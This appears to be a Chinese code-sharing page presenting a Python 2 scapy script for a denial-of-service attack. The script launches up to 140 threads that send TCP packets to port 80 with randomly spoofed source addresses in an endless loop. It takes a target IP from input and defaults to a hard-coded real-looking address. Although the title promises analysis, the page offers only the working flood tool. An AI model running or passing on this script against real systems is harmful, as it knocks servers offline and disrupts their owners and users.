复制代码 代码如下:
# -*- coding: cp936 -*-
from scapy.all import *
from threading import Thread,activeCount
from random import randint

class Loop(Thread):
    def __init__(self,remoteAddr):
        Thread.__init__(self)
        self.remoteAddr = remoteAddr

    def run(self):
        ip = str(randint(0,255))+'.'\
             +str(randint(0,255))+'.'\
             +str(randint(0,255))+'.'\
             +str(randint(0,255))
        sr1(IP(src = ip,dst = self.remoteAddr)/TCP(dport = 80),retry = 0,verbose = 0,timeout = 3)

       
class Main(Thread):
    def __init__(self,remoteAddr):
        Thread.__init__(self)
        self.remoteAddr = remoteAddr

    def run(self):
        limit = 140
        total = 0

        while True:
            if activeCount() < limit:
                Loop(remoteAddr = self.remoteAddr).start()
                total = total + 1
            print '目前已经进行的HttpFlood的次数为:',total

if __name__ == '__main__':
    remoteAddr = raw_input('IP=')
    if remoteAddr == '':
        remoteAddr = '202.103.25.12'

    Main(remoteAddr = remoteAddr).start()

标签:
拒绝服务攻击

免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
白云城资源网 Copyright www.dyhadc.com

评论“分析python服务器拒绝服务攻击代码”

暂无“分析python服务器拒绝服务攻击代码”评论...